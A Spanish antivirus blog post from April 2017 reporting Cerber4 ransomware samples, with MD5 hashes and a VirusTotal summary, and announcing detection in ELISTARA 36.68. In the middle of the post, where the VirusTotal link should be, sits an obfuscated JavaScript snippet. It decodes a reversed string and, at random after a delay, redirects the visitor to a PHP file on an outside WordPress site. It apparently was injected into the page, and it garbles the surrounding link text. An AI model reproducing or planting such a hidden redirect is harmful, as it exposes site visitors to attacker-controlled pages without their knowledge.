Y EL RANSOMWARE CERBER4 SIGUE EN SU LINEA…

Aparte del Cryptolocker, el ransomware que tenemos mas insistente es el CERBER4, que llegan anexados a mails maliciosos y codificam los ficheros de datos, y aunque luego el malware se autoborra, la destroza en los mails codificados queda…

Los pasamos a controlar a partir del ELISTARA 36.68 de hoy

El analisis MD5 de los tres últimos recibidos, presentan estos hashes:

“078B8F122FAD4102B2C7B4DBE2A354D1” -> 078b8f12.exe 524970
“17790986AC252140AA11651FDF827EEA” -> 17790986.exe 369322
“E50A36754979DEEB77F12B81B2C86B73” -> e50a3675.exe 282795

Y el preanalisis de viristotal del último recibido, presente este informe:

MD5 e50a36754979deeb77f12b81b2c86b73
SHA1 2707f2e30b8e6a8034a266c26c48266d761814a5
Tamaño del fichero 276.2 KB ( 282795 bytes )
SHA256:
907e0480f6d5a3f258494e6edd94b2a8c3e6a7b824b02120bd48dba3bd644f26
Nombre:
e50a3675.exe
Detecciones:
16 / 62
Fecha de análisis:
2017-04-21 12:36:52 UTC ( hace 1 minuto )

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/907e0480f6d5a3f258494e6edd94b2a8c3e6a7b824b02120bd48dba3bd644f26/analysis/1492778212/” target=”_blank” rel=”noopener noreferrer”>l informe actual de virustotal 

Dicha versión del ELISTARA 36.68 que los detecta y elimina, estará disponible en nuestra web a partir de las 15 h CEST de hoy

saludos

ms, 21-4-2017